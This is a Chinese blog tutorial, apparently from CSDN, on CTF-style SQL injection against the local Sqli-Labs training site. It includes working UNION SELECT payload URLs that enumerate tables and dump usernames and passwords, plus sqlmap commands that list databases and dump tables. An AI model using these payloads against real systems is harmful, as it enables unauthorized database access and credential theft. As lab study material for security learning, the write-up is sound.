CTFweb篇-SQL注入(一)

最新推荐文章于 2024-08-14 08:00:00 发布
最新推荐文章于 2024-08-14 08:00:00 发布
阅读量1.5k 收藏 5
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44597701/article/details/107968247
版权

基本函数和知识

基本数据库information_schema

information_schema是一个数据库,放的是一些视图,在SQL文件中找不到。
其中具有表schemata(数据库名)、tables(表名)、columns(列名获字段名)
schemata表中有schema_name来存储数据库名
在tables表中,table_schema和table_name来存储数据库名和表名
在columns表中,有table_schema、table_name、column_name

基本函数

user()

查看当前Mysql登录用户名

database()

查看当前使用Mysql数据库名

version()

查看当前Mysql版本

group_concat()

group_concat( [DISTINCT] 要连接的字段 [Order BY 排序字段 ASC/DESC] [Separator ‘分隔符’] )
将同一分组分组的要连接的字段放在同一行
默认以逗号隔开
不加group by就是将所有的看作一组

limit关键字

limit m,n:只显示m到m+n行数据

常用注释

注释符

#:单行注释
–空格:单行注释(空格一般会被浏览器吃掉,最好用%20)
/* */:多行注释

内联注释(只有Mysql可识别)

/*! */

SQL注入类型

数字型

select * from table where id = 用户输入id

字符型

select * from table where id = ‘用户输入id’

检测SQL注入点

通过在URL中修改对应的ID值为正常数字、大数字、字符(单引号、双引号、双单引号、双双引号)、\来探测URL是否存在注入点

Sqli-Lab less1~4,GET基于报错的SQL注入

Less1

在这里插入图片描述
输入id=1
在这里插入图片描述
显示出了用户名和密码
接着不断更改id,发现在15时没了,说明该数据库只有15个用户
接下来进行注入点判断,在id值后面加’
在这里插入图片描述
报错:’‘1’’ LIMIT 0,1’--------------->去除两边报错信息加的双单引号------------>‘1’’ LIMIT 0,1
证明这里会对输入的id自动在两边加入单引号:

select userName,passWord from table where ID = 'ID值' limit 0,1

绕过方法:
传入?id=1’–20%---------->将后面自动加的’给注释掉

Less2

传入id=1’
报错:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’ LIMIT 0,1’ at line 1
‘’ LIMIT 0,1’--------------->去除两边报错信息加的双单引号------------>1’ LIMIT 0,1
证明这里输入的ID就是数值:

select userName,passWord from table where ID = ID值 limit 0,1

绕过方法:
传入?id=1–20%’

Less3

传入id=1’
报错:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘1’’) LIMIT 0,1’ at line 1
‘‘1’’) LIMIT 0,1’--------------->去除两边报错信息加的双单引号------------>'1") LIMIT 0,1
证明这里输入的id值会在两边加(‘ID值’):

select userName,passWord from table where ID = ('ID值') limit 0,1

绕过方法:
传入?id=1’)–%20

Less4

传入参数id=1’
在这里插入图片描述
正常显示
传入id=1"
报错:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘“1"”) LIMIT 0,1’ at line 1
‘“1"”) LIMIT 0,1’--------------->去除两边报错信息加的双单引号------------>“1"”) LIMIT 0,1
证明会在传入的id值两边加了(“id值”)

select userName,passWord from table where ID = ("ID值") limit 0,1

为什么会在传入1’,1)等这些参数值时仍然不报错?
因为在SQL语法中双引号内的这些符号都被看做普通字符串,并且可以将其中的数字提出来,只有加双引号或者转义字符才可以进行对应的转换。
绕过方法:
?id=1")–%20

常用的方法

利用order by判断字段数

字段数就是属性列数
因为有几个属性才可以用几个属性去排序

Less1的利用

利用less1 的union联合user()、version()、database()函数进行插入:

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1  UNION SELECT 1,user(),version()--%20

在这里插入图片描述
查看到了用户名和版本
查看table:

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' UNION SELECT 1,group_concat(table_name),3 from information_schema.tables where  table_schema=database()--%20

information_schema.tables:information_schema数据库中的tables表
table_schema(数据库名):tables表中的列名。
查看列名:

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' UNION SELECT 1,group_concat(column_name),3 from information_schema.columns where  table_name='users'--%20

在这里插入图片描述
查出来了所有的列名
查看所有用户名和密码:

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' UNION SELECT -1,group_concat(username,':',password),3 from users--%20

在这里插入图片描述

利用sqlmap进行探寻

1、查数据库
python sqlmap.py -u “http://127.0.0.1/sqli-labs-master/Less-1/?id=1” --batch --dbs

在这里插入图片描述
–batch:进行默认设置
–dbs:返回所有数据库
2、查所有表
python sqlmap.py -u “http://127.0.0.1/sqli-labs-master/Less-1/?id=1” -D security --tables --batch
在这里插入图片描述
-D:数据库
–tables:返回指定数据库的所有表
3、查指定表中的所有列
python sqlmap.py -u “http://127.0.0.1/sqli-labs-master/Less-1/?id=1” -D security -T users --columns --batch
在这里插入图片描述
-T:指定表
–columns:返回所有指定表所有列
4、显示表中内容
python sqlmap.py -u “http://127.0.0.1/sqli-labs-master/Less-1/?id=1” -D security -T users -C username,password --dump --batch
在这里插入图片描述
–dump:就是显示表中数据

总之sqlmap功能很强大

weixin_44597701
关注
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
CTF-web】bugku-成绩查询sql注入
Sankkl1的博客
08-17 668
再测试,当id为1’时,无数据,而当id为1’#时,又正确返回了数据,推测构造的数据库查询语句可能是类似。查询skctf库中的表的名称,结果其中有一个表名为fl4g,很可能其中就包含了flag。查询fl4g表中的列名,发现其中有一列的名称为skctf_flag。如上图所示,当id为1时返回名字为“龙龙龙”的成绩单。我们要找到能返回能够返回我们需要的信息的位置,当。时,数据不显示,可以知道一列数据有4列。时,我们可以查询到库名,如下图所示。这样的,其中XX为传入的参数。时,可以正常显示,直到。
bugku ctf 成绩查询 解题思路
YouthBelief的博客
03-08 1115
0x00 环境地址 https://ctf.bugku.com/challenges/detail/id/84.html 成绩查询 大概率sql注入 0x01 解题思路 1.1 根据提示输入1 2 3 测试正常数据 1 2 看来是根据id查询 1.2 测试是否报错(不产生报错) ' " ') ") % %) )) 等等 1.3 猜测sql语句为 select Math_score,English_score,Chinese_score from score_table where
CTFHub~SQL注入超简单详细教程
最新发布
weixin_67832625的博客
08-14 1022
本文主要是对CTFHub靶场的SQL注入做了详细的教程讲解,让练习者对SQL注入有更详细的了解和深入,如有什么问题,随时联系作者
CTFweb题库笔记(难度1)
cocoaiu的博客
08-11 8324
CTF笔记
ctf-web-成绩查询
god_001的博客
04-13 1168
题目: 打开网页: 一个提交页面,按提示输入1,2,3能够得到三个成绩单表格:如1时: 查看源代码: 发现,表单使用post方式提交,并且name="id" 猜测使用SQL注入 首先检测闭合方式: 分别post id=1' id=1" 发现post id=1"时,正常,post id=1'时无响应 应该是单引号 ' ' 闭合 再通过order by查询当前表列数: 于是可以判断...
ctfshow---sql注入(171-213)
fainpo的博客
05-01 797
这里提一句,为什么不直接替换成acb这种,因为,flag原本就有字母,还原的时候会全部都还原成数字的,数字替换成符号应该也是可以的,这边测试了下除了&#好像别的符号都可以。插入查询查询语句就会变成这样,由于id=11111这是一个不存在的id,而后面1=1又为真,所以会查询到表内所有的内容,--+是注释后面的字符。因为接受username的时候没有用引号,所以接受单纯的数字,而数字和字符比较会转换类型,字符串会变成数字0进行比较,所以相等。
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
了解如何防范SQL注入、命令注入和文件包含注入至关重要。 2. **变量和作用域**:理解PHP中的变量如何工作,以及全局、局部、静态和超全局变量的作用域,有助于识别可能导致安全问题的代码片段。 3. **文件操作**:...
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
1. **SQL注入**:参赛者需要了解如何利用不安全的SQL查询来获取敏感信息,以及如何防御这类攻击,如参数查询输入验证和使用预编译语句。 2. **XSS(Cross Site Scripting)**:试题可能包含对XSS漏洞的利用,如...
ctf web培训资料pdf
10-06
通过url访问靶机web站点,观察页面中的功能点,对可能存在漏洞的页面进行探测。 常见的漏洞特征: SQL注入:www.example.com?id=1 文件包含:www.example.com?page=file1.php 文件上传
SQL注入漏洞演示源代码
07-15
SQL注入漏洞是网络安全领域中的一个重要话题,它涉及到数据库管理和Web应用程序的安全性。在这个"SQL注入漏洞演示源代码"中,我们可以深入理解这种攻击方式的工作原理,并学习如何防止它。 SQL注入是通过在输入字段...
CTFHUB-web-SQL注入
ookami6497的博客
11-29 841
CTFHUB SQL
CTF系列之Web——联合查询注入
洛柒尘的博客
06-27 3532
前言 在刚学习SQL注入的过程中非常艰难,查资料的时间有一周这么长,点开的网页也不下一千,认真读的也最少有两百,可是能引导入门的真的没几,都是复制来复制去的,没意思,感觉就是在浪费时间。有很多知识点都很散,很少能考到一片吧所有知识点总结在一块,最少也要三四个知识点也好呀,可惜太少了,大部分大佬写的都是基于他们现有的技术写的,写的很笼统,不适合新手看。可以发现很多大佬的文章看不懂就是这个原因,没有基础看的很懵的。所以我就想着写两三来总结我学习过的SQL注入知识点。 学习web系列推荐先学习MySQL、H
bugku ctf 实战2-注入
qq_42777804的博客
08-08 2738
     进去之后发现       wtf!?     这个怎么可以注入  !?????? 经过不断的点击发现     有注入点  哈哈哈哈哈 这样就简单了  按正常步骤来      正常的数字型注入   利用联合查询   http://www.kabelindo.co.id/readnews.php?id=24%20and%201=2%20union%20s...
ctf web练习之SQL注入
weixin_51614848的博客
04-19 644
1.首先看题目像SQL注入,于是用burpsuit抓包。针对数据库web2(与题目名字一致)再爆表名,使用指令。备注:本文仅供自用,如有错误,欢迎指出。得到列名,再对列进行爆破,使用指令。把以上所有内容复制到1.txt中。2.使用sqlmap,使用指令。
CTFSHOW WEB入门——sql注入
Chur的博客
07-22 4773
ctfshow 靶场 web入门 sql注入系列
ctfshow web入门 sql注入
weixin_74427106的博客
02-10 2807
sql注入分为多种类型的注入,我将对ctfshow web入门的sql入门进行题目分类,并在最后对每种sql注入做一下总结;
# “百度杯”CTF比赛 九月场SQLi
sinat_40845893的博客
01-02 259
“百度杯”CTF比赛 九月场SQLi 数据库注入,无逗号union查询构造 求解流程: 进入题目,页面空白,查看源代码 <html> <head><title>Loading...</title></head> <body> <!-- login.php?id=1 --> </body> </html> 根据提示发送GET求login.php?id=1 welcome admin~&
CTFHub SQL注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-09 1130
ctfhub的SQL注入中的flag是动态生成的 1、整数型注入 1、按照提示输入1 发现直接给出了SQL语句,根据给出的SQL语句可以判断出直接使用联合查询即可 2、先使用order by判断字段数 首先使用order by 3 ,页面无回显,改为2之后页面显示正确。因此判断当前数据库当前表,共有2个字段。 3、使用联合查询,判断页面显示位 首先将id改为一个不存在的纸,根据联合查询的特性,就会返回11111,222222然后显示在页面上。 4、查询数据库版本 5、查询当前数据库 6、查询所有数
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值